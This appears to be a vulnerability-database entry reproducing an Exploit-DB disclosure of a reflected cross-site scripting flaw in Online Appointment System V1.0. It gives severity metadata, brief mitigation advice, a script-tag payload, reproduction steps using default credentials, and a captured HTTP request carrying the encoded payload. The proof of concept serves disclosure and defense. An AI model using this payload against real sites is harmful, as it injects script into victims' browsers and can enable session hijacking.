Online Appointment System V1.0 - Cross-Site Scripting (XSS)

vendor:

Online Appointment System

by:

Sanjay Singh

7.5

CVSS

HIGH

Cross-Site Scripting (XSS)

CWE

Product Name: Online Appointment System

Affected Version From: V1.0

Affected Version To: V1.0

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:online_appointment_system_v1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

Online Appointment System V1.0 – Cross-Site Scripting (XSS)

An attacker can exploit this vulnerability by crafting a malicious payload and sending it to the vulnerable application. The payload is then executed in the browser of the victim when the vulnerable page is loaded. The payload can be sent to the vulnerable application in various ways such as via a malicious link, via a malicious file, or via a malicious parameter.

Mitigation:

Input validation, output encoding, and content security policy can be used to mitigate XSS attacks.

Source

Exploit-DB raw data:

# Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS)
# Date: 25/02/2023
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html
# Tested on: Windows

use payload="><script>alert(XSS)</script>

1.	visit-http://localhost/doctor/applicationlayer/Doctorpatient.php

2.	login Doctor account with default credential

3.	Click left side add description

4.	capture request and put payload 

http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E



request

GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close